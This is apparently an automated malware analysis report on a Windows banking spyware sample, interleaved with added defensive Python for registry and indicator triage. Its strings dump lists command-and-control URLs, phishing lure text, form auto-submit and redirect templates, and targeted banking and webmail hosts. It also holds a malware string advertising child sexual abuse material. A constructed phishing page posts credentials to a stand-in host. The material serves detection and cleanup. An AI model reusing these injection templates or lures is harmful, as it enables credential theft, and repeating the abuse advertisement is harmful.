HEUR:Trojan.Win32.Generic (Kaspersky), GenPack:Generic.Malware.SYd!g.49851E96 (B) (Emsisoft), GenPack:Generic.Malware.SYd!g.49851E96 (AdAware), Trojan-Spy.Win32.Qukart.FD, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Spy, Banker, Trojan, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0778d6b0c6f2050acb6eaf8fdbe57d12
SHA1: af58630b1d7296e1208d97fa47a786484985472e
SHA256: e056cd9afcf111bfab4157806a2dd1e3668542ca3e3b45c5015cea709d1678bb
SSDeep: 768:ZfYyzXvXNw2GgG/EtGs9JuPRMdXlowSEYJY5zx GZtt8H/iw08X/1H5:VHb/Nw7gWEtIadVBhmf5089
Size: 51712 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2024-04-18 22:06:08
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Spy. Spy program intended for stealing user's confidential data.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The GenPack creates the following process(es):
%original file name%.exe:2844
The GenPack injects its code into the following process(es):
Kjicmmcl.exe:2796
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Kjicmmcl.exe:2796 makes changes in the file system.
The GenPack creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (552 bytes)
%System%\surf.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (207 bytes)
The GenPack deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (0 bytes)
The process %original file name%.exe:2844 makes changes in the file system.
The GenPack creates and/or writes to the following file(s):
%System%\Ohpdhf32.dll (6 bytes)
%System%\Kjicmmcl.exe (102 bytes)
Registry activity
The process Kjicmmcl.exe:2796 makes changes in the system registry.
The GenPack creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 15 8E 82 C0 55 5E 25 DD 0A D1 63 87 53 F4 A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess]
"BrowseNewProcess" = "yes"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1601" = "0"
The process %original file name%.exe:2844 makes changes in the system registry.
The GenPack creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 27 27 4F 4F 3A A5 76 47 0B 70 83 CC A2 30 C1"
[HKCR\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32]
"(Default)" = "%System%\Ohpdhf32.dll"
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"Web Event Logger" = "{79FEACFF-FFCE-815E-A900-316290B5B738}"
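The two registry writes above are the sample's persistence: a CLSID whose InProcServer32 is the dropped Ohpdhf32.dll, registered under ShellServiceObjectDelayLoad (SSODL) as "Web Event Logger", so Explorer loads the DLL at every logon (the "CLSID\%s\InProcServer32" and "%s\%s.dll" format strings in the dump below are how the sample builds those paths). The following Python is an added example, not the analysis system's or the sample's code: it parses a regedit export, resolves each SSODL value to its InProcServer32 DLL, and flags entries absent from a clean-machine baseline. The export text is constructed for the example; the WebCheck CLSID is a stock Windows entry, but the baseline set itself is an assumption to be populated from a known-clean host.

```python
"""Added example (not the analysis system's code): resolve ShellServiceObjectDelayLoad
(SSODL) entries to their InProcServer32 DLLs from a regedit export and flag the
ones absent from a clean-machine baseline."""
import re

# Constructed "REGEDIT 5.00" export for the example.  It contains the two keys this
# report shows the sample writing, plus the standard WebCheck entry for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"WebCheck"="{E6FB5E20-DE35-11CF-9C87-00AA005127ED}"
"Web Event Logger"="{79FEACFF-FFCE-815E-A900-316290B5B738}"

[HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32]
@="C:\\WINDOWS\\system32\\webcheck.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32]
@="C:\\WINDOWS\\system32\\Ohpdhf32.dll"
"ThreadingModel"="Apartment"
'''

# Assumed baseline: SSODL CLSIDs exported from a known-clean host of the same
# Windows build.  WebCheck is a stock Windows XP entry; extend from your own image.
BASELINE_CLSIDS = {"{E6FB5E20-DE35-11CF-9C87-00AA005127ED}"}

SSODL_SUFFIX = r"\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad".upper()
# "name"=data or @=data; string data is quoted, other types (dword:, hex:) are not.
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(?:"((?:[^"\\]|\\.)*)"|(.*))$')


def _unescape(s):
    """Undo the .reg escaping (doubled backslashes, backslash-escaped quotes)."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}}; the default (@) value is stored under ''.
    Only string values are unescaped; other types keep their raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line) if current else None
        if m:
            name = "" if m.group(2) else _unescape(m.group(1))
            data = _unescape(m.group(3)) if m.group(3) is not None else m.group(4)
            keys[current][name] = data
    return keys


def ssodl_entries(keys):
    r"""List (value_name, clsid, inproc_dll) for every SSODL value; inproc_dll is None
    when no CLSID\<guid>\InProcServer32 key is present in the export (HKCR or
    HKLM\SOFTWARE\Classes both match, since only the path suffix is compared)."""
    entries = []
    for path, values in keys.items():
        if not path.upper().endswith(SSODL_SUFFIX):
            continue
        for name, clsid in values.items():
            target = ("\\CLSID\\" + clsid + "\\InProcServer32").upper()
            dll = next((v.get("") for p, v in keys.items() if p.upper().endswith(target)), None)
            entries.append((name, clsid, dll))
    return entries


def suspicious_ssodl(keys, baseline_clsids=BASELINE_CLSIDS):
    """Flag SSODL entries whose CLSID is not in the baseline or whose server DLL
    cannot be resolved (a dangling CLSID is also worth a look)."""
    allowed = {c.upper() for c in baseline_clsids}
    return [e for e in ssodl_entries(keys) if e[1].upper() not in allowed or e[2] is None]


def triage(reg_text, baseline_clsids=BASELINE_CLSIDS):
    """Parse an export and return the suspicious SSODL entries."""
    return suspicious_ssodl(parse_reg_export(reg_text), baseline_clsids)


if __name__ == "__main__":
    for name, clsid, dll in triage(SAMPLE_REG):
        print(f"SUSPICIOUS SSODL entry {name!r} -> {clsid} -> {dll}")
```

On a live host the same logic applies to the output of `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad` plus an export of HKCR\CLSID; matching on the path suffix keeps the check independent of which hive alias the export used.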
Dropped PE files
MD5 | File path |
---|---|
3f17822b7526b58f1c18a4f5c62e7531 | c:\WINDOWS\system32\Kjicmmcl.exe |
5103118072cc7fd7c801e0747e9977e0 | c:\WINDOWS\system32\Ohpdhf32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2844
- Delete the original GenPack file.
- Delete or disinfect the following files created/modified by the GenPack:
%Documents and Settings%\%current user%\Local Settings\Temp\ldpneonc.htm (221 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bkmmeqjl.htm (552 bytes)
%System%\surf.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cjcgngof.htm (207 bytes)
%System%\Ohpdhf32.dll (6 bytes)
%System%\Kjicmmcl.exe (102 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe" = "%System%\ctfmon.exe"
- Also remove the persistence entries recorded under Registry activity above, which the list above omits: the "Web Event Logger" value in [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad] and the key [HKCR\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}], whose InProcServer32 points at %System%\Ohpdhf32.dll. Note that ctfmon.exe is a standard Windows component (the text services loader) and nothing in this report shows the sample modifying that Run value; verify it before deleting it.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 32428 | 32768 | 4.9306 | f537d294ff3c5892eac246be2ddef3e2 |
.bss | 36864 | 136112 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 176128 | 12752 | 12800 | 4.18685 | 7d657d7d2cc8c83204ceb9c4e7c3e40d |
.idata | 192512 | 3748 | 4096 | 3.5204 | 708cff90e55fcc1f43ce49fc7ad6f7f4 |
.aciof | 196608 | 4096 | 512 | 1.55733 | 5feef8bafc608bebf63c900b04113e75 |
Note: .bss has a 136112-byte virtual size but no raw data. That is consistent with the "Packed" entropy verdict and the PEiD packer match above: the packer commonly reserves such a region and unpacks into it at run time, so a memory dump of the running process (see Strings from Dumps below) shows more than the file on disk.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The GenPack connects to the servers at the following location(s):
Strings from Dumps
Kjicmmcl.exe_2796:
.text
.data
.idata
.aciof
%System%\dnkk.dll
%System%\surf.dat
%System%\kk32.dll
%System%\kk32.vxd
%System%
hXXp://crutop.nu/index.php
hXXp://crutop.ru/index.php
hXXp://mazafaka.ru/index.php
hXXp://color-bank.ru/index.php
hXXp://asechka.ru/index.php
hXXp://trojan.ru/index.php
hXXp://fuck.ru/index.php
hXXp://goldensand.ru/index.php
hXXp://filesearch.ru/index.php
hXXp://devx.nm.ru/index.php
hXXp://ros-neftbank.ru/index.php
hXXp://lovingod.host.sk/index.php
hXXp://VVV.redline.ru/index.php
hXXp://cvv.ru/index.php
hXXp://hackers.lv/index.php
hXXp://fethard.biz/index.php
hXXp://ldark.nm.ru/index.htm
hXXp://gaz-prom.ru/index.htm
hXXp://promo.ru/index.htm
hXXp://potleaf.chat.ru/index.htm
hXXp://kadet.ru/index.htm
hXXp://cvv.ru/index.htm
hXXp://crutop.nu/index.htm
hXXp://crutop.ru/index.htm
hXXp://mazafaka.ru/index.htm
hXXp://xware.cjb.net/index.htm
hXXp://konfiskat.org/index.htm
hXXp://parex-bank.ru/index.htm
hXXp://kidos-bank.ru/index.htm
hXXp://kavkaz.ru/index.htm
hXXp://fethard.biz/index.htm
CRYPTKEY
ntdll.dll
kernel32.dll
wsock32.dll
user32.dll
`.rdata
@.data
.reloc
.edata
%s\%s
WinExec
KERNEL32.DLL
CRTDLL.DLL
dll.dll
This KEWL STUFF was coded by V. V. PUPKIN, moderator of crutop.nu
Welcome to our forum, Adult Web Masters! hXXp://crutop.nu
AWM, welcome to CRUTOP.NU - HARDCORE/CONTENT/CHILD PORNO/LOLITAS/RAPE
REAL CASH, REAL BITCHEZ - CRUTOP.NU
%s-%s
%s %s
surf.dat
dnkk.dll
kk32.vxd
kk32.dll
%s\%s.exe
%s/Rtdx1%i.htm
%s\Rtdx1%i.dat
%s /C %s
\command.com
%s\command.pif
%s\cmd.exe
%s\cmd.pif
:u
of fraud on our website, we are undertaking a period review of our member accounts.
%ssetTimeout("x()",%u);
%sself.parent.location="%s";
%s
%s%u - Microsoft Internet Explorer
\Iexplore.exe
.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
%ssetTimeout("z()",%u);
%sdocument.%s.submit();
%s
%s%u%s
%s
%s%c%c
Web Event Logger
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
CLSID\%s\InProcServer32
%s\%s.dll
{79FEACFF-FFCE-815E-A900-316290B5B738}
TXT: '%s'
%s %X%c
%s FORM_%X
.yahoo.com
webmail.juno.com
my.juno.com/s/
.juno.com
.earthlink.
signin.ebay.
.paypal.com
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
GetWindowsDirectoryA
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
ole32.DLL
OLEAUT32.DLL
WININET.DLL
USER32.DLL
GDI32.DLL
ADVAPI32.DLL
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
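The printf-style templates in the dump above (`%ssetTimeout("x()",%u);`, `%sdocument.%s.submit();`, `%sself.parent.location="%s";`), the "of fraud on our website" lure text, the target host fragments (.paypal.com, signin.ebay., .yahoo.com, .juno.com, .earthlink.) and the `%s/Rtdx1%i.htm` drop path are consistent with the small Temp\*.htm files listed under File activity. The following Python is an added example, not part of this report or the analysis system's code: it turns those templates into regexes that match the rendered output (the technique generalises to any printf template recovered from a dump) and uses them, together with the literal strings, to triage a dropped page or a decoded memory dump. The sample page is constructed for the example, the form action URL in it is hypothetical, and the two-indicator threshold is a choice of mine, not something the report states.

```python
"""Added example (not the analysis system's code): compile printf-style templates
recovered from the Kjicmmcl.exe dump into regexes and triage dropped .htm files
or decoded dumps for the injected-page indicators quoted in this report."""
import re

# Format-string templates quoted in the "Strings from Dumps" section.
TEMPLATES = {
    "redirect_parent": '%sself.parent.location="%s";',
    "timer_x": '%ssetTimeout("x()",%u);',
    "timer_z": '%ssetTimeout("z()",%u);',
    "auto_submit": '%sdocument.%s.submit();',
    "ie_title": '%s%u - Microsoft Internet Explorer',
    "drop_htm": '%s/Rtdx1%i.htm',
    "form_label": '%s FORM_%X',
}
# Literal strings from the same dump.
LITERALS = {
    "fraud_lure": 'of fraud on our website, we are undertaking a period review of our member accounts.',
    "ssodl_name": 'Web Event Logger',
    "clsid": '{79FEACFF-FFCE-815E-A900-316290B5B738}',
}
TARGET_HOSTS = ['.paypal.com', 'signin.ebay.', '.yahoo.com', '.juno.com', '.earthlink.']

_SPEC = re.compile(r'%(?:s|u|i|X|c)')
_SPEC_RE = {'%s': r'.*?', '%u': r'\d+', '%i': r'-?\d+', '%X': r'[0-9A-F]+', '%c': r'.'}


def template_to_regex(fmt):
    """Compile a printf template into a regex that matches its rendered output:
    %s -> lazy wildcard, %u/%i -> digits, %X -> upper-case hex, %c -> one char.
    Everything else is matched literally."""
    parts, pos = [], 0
    for m in _SPEC.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        parts.append(_SPEC_RE[m.group()])
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile(''.join(parts), re.DOTALL)


COMPILED = {name: template_to_regex(t) for name, t in TEMPLATES.items()}


def scan_text(text):
    """Return the set of indicator names present in a page or decoded dump."""
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    hits |= {name for name, lit in LITERALS.items() if lit in text}
    if any(h in text for h in TARGET_HOSTS):
        hits.add('target_host')
    return hits


def is_injected_page(text, min_hits=2):
    """Flag a page when at least min_hits independent indicators co-occur; a lone
    setTimeout or a lone host name is far too common in benign pages to act on.
    The threshold is an assumption for this example."""
    return len(scan_text(text)) >= min_hits


# Constructed sample of what a rendered Temp\*.htm from this family could look like;
# not a real capture, and the action URL is hypothetical.
SAMPLE_PAGE = (
    '<html><body><p>Due to recent cases of fraud on our website, we are undertaking '
    'a period review of our member accounts.</p>'
    '<form name="f1" method="post" action="http://example.invalid/collect">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<script>setTimeout("x()",3000);document.f1.submit();'
    'self.parent.location="https://www.paypal.com/";</script></body></html>'
)
# Constructed benign page: one coincidental template hit only.
BENIGN_PAGE = '<html><head><script>setTimeout("x()",500);</script></head></html>'

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        print(label, sorted(scan_text(page)), "flagged" if is_injected_page(page) else "clean")
```

Run it over every small .htm under %Temp% and Temporary Internet Files on a suspect host; the `%s` prefix in each template becomes a lazy wildcard, so the regexes match inside whatever HTML the sample wrapped around the injected script.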